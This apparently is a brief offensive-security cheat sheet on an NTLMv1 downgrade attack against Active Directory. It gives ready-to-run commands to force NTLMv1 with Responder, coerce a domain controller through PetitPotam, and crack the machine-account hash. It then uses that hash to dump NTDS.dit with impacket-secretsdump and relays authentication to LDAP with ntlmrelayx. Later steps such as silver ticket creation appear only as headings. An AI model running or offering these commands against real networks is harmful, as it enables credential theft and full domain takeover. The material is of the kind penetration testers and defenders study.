NTLMv1
NTLMv1 downgrade
Add the following line to Responder.conf
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788Run Responder
sudo responder -I <network interface> --lm --disable-essRun coercer
# e.g. https://github.com/topotam/PetitPotam
python3 Petitpotam.py <listener IP> <target DC IP> -u <USERNAME> -p <PASSWORD>Crack NTLMv1 hash for the coerced computer account
# https://ntlmv1.com
Enter the first hash after the domain : e.g. DC01$::<FQDN>:<NTHASH>Dump NTDS.dit using machine NTLM hash
impacket-secretsdump -hashes ':<MACHINE HASH>' '<FQDN>/<HOSTNAME>'@<DC-IP>NTLMv1 LDAP relay
Relay authentication to LDAP from first to second DC
impacket-ntlmrelayx -t ldap://<DC1-IP> --remove-mic -smb2support --delegate-accessForce authentication
Create silver ticket
Dump NTDS NTLM hashes
Last updated